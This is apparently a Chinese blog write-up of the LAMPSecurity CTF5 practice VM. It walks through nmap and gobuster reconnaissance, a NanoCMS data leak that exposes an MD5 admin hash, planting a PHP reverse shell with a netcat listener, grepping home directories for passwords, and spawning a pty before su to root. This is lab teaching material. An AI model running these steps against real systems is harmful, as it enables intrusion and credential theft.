LAMPSecurityCTF5靶机练习
声明
B 站UP主泷羽sec
笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。
✍🏻作者简介:致力于网络安全领域,目前作为一名学习者,很荣幸成为一名分享者,最终目标是成为一名开拓者,很有趣也十分有意义
🤵♂️ 个人主页: @One_Blanks
欢迎评论 💬点赞👍🏻 收藏 📂加关注+
- 关注公众号:泷羽Sec-Blanks
X
带你去体验最真实的渗透环境,文章里不会直接摆答案,会全面的带你去进行信息收集以及漏洞利用,会领着你一步一步踩下我踩过的坑,实战往往比这更绝望,练技术须实践。
主机发现与信息收集
nmap -sn 192.168.25.0/24
export ip=192.168.25.140
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
37177/tcp open unknown
MAC Address: 00:0C:29:F7:EA:95 (VMware)
nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,37177 $ip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
25/tcp open smtp Sendmail 8.14.1/8.14.1
80/tcp open http Apache httpd 2.2.6 ((Fedora))
110/tcp open pop3 UW Imap pop3d 2006k.101
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp open imap UW imapd 2006k.396
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
3306/tcp open mysql MySQL 5.0.45
37177/tcp open status 1 (RPC #100024)
nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,37177 $ip
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
| http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
| c
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_ http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-enum:
| /info.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
| /squirrelmail/images/sm_logo.png: SquirrelMail
| /icons/: Potentially interesting folder w/ directory listing
|_ /inc/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.140
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.25.140:80/events/
| Form id: user-login-form
| Form action: /events/?q=node&destination=node
|
| Path: http://192.168.25.140:80/?page=contact
| Form id:
| Form action: ?page=contact
|
| Path: http://192.168.25.140:80/events/?q=node/2
| Form id: user-login-form
| Form action: /events/?q=node/2&destination=node%2F2
|
| Path: http://192.168.25.140:80/events/?q=node&destination=node
| Form id: user-login-form
| Form action: /events/?q=node&destination=node%3Famp%253Bdestination%3Dnode
|
| Path: http://192.168.25.140:80/events/?q=tracker
| Form id: user-login-form
| Form action: /events/?q=tracker&destination=tracker
|
| Path: http://192.168.25.140:80/events/?q=blog
| Form id: user-login-form
| Form action: /events/?q=blog&destination=blog
|
| Path: http://192.168.25.140:80/events/?q=event
| Form id: event-taxonomy-filter-form
| Form action: /events/?q=event
|
| Path: http://192.168.25.140:80/events/?q=event
| Form id: event-type-filter-form
| Form action: /events/?q=event
|
| Path: http://192.168.25.140:80/events/?q=event
| Form id: user-login-form
| Form action: /events/?q=event&destination=event
|
| Path: http://192.168.25.140:80/events/?q=node/1
| Form id: user-login-form
| Form action: /events/?q=node/1&destination=node%2F1
|
| Path: http://192.168.25.140:80/events/?q=comment/reply/2
| Form id: comment-form
| Form action: /events/?q=comment/reply/2
|
| Path: http://192.168.25.140:80/events/?q=comment/reply/2
| Form id: user-login-form
| Form action: /events/?q=comment/reply/2&destination=comment%2Freply%2F2
|
| Path: http://192.168.25.140:80/events/?q=blog/1
| Form id: user-login-form
| Form action: /events/?q=blog/1&destination=blog%2F1
|
| Path: http://192.168.25.140:80/events/?q=user/register
| Form id: user-register
|_ Form action: /events/?q=user/register
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
37177/tcp open unknown
MAC Address: 00:0C:29:F7:EA:95 (VMware)
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
80端口Web服务渗透
目录爆破
gobuster dir -u http://192.168.25.140/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/events (Status: 301) [Size: 316] [--> http://192.168.25.140/events/]
/mail (Status: 301) [Size: 314] [--> http://192.168.25.140/mail/]
/list (Status: 301) [Size: 314] [--> http://192.168.25.140/list/]
/inc (Status: 301) [Size: 313] [--> http://192.168.25.140/inc/]
/phpmyadmin (Status: 301) [Size: 320] [--> http://192.168.25.140/phpmyadmin/]
/squirrelmail (Status: 301) [Size: 322] [--> http://192.168.25.140/squirrelmail/]
根据提示出现文件包含漏洞
http://192.168.25.140/?page=about%27%20OR%20sqlspider
http://192.168.25.140/events/?q=event%2Fical%27%20OR%20sqlspider
发现CMS框架
http://192.168.25.140/~andy/
NanoCMS
利用EXP
searchsploit NanoCMS
发现存在远程命令指定漏洞,但是后面的授权我们没有只能pass
在浏览器上搜一下看看有没有
https://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.100141
在这里我们发现了一个信息泄露的漏洞
/data/pagesdata.txt 在目录里面
http://192.168.25.140/~andy/data/pagesdata.txt
;s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd"
hash-identifier 9d2f75377ac0ab991d40c91fd27e52fd
判断密码加密方式为md5
md5破解网站:
pmd5.com
ttmd5.com
www.somd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash (收藏收藏)
密码破解为 shannon
管理员后台登录
http://192.168.25.140/~andy/data/nanoadmin.php
成功进入
站内嵌入php的反弹shell代码
保存后在Kali里开启监听
nv -nvlp 4444
回来点击Contact
获取初始权限
成功连上
提权
whoami
id
ip addr
ls
uname -a
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
patrick❌500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer❌501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy❌502:502:Andrew Carp:/home/andy:/bin/bash
loren❌503:503:Loren Felt:/home/loren:/bin/bash
amy❌504:504:Amy Pendelton:/home/amy:/bin/bash
mysql❌27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus❌76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
搜索用户痕迹,寻找用户凭据泄露
grep -R -i pass /home/* 2>/dev/null
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
Root密码:50$cent
提示需要tty交互环境
python -c ‘import pty; pty.spawn(“/bin/bash”)’
输入代码执行
su - 切换至ROOT用户,- 后面没参数默认为root用户
使用sudo su时,需要输入当前用户自己的密码,
因为sudo的机制是基于当前用户的权限来验证是否可以执行后续的命令(这里是su)。如果当前用户没有在sudoers文件中被授权使用sudo来执行su命令,即使输入正确的当前用户密码,也无法成功执行sudo su。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
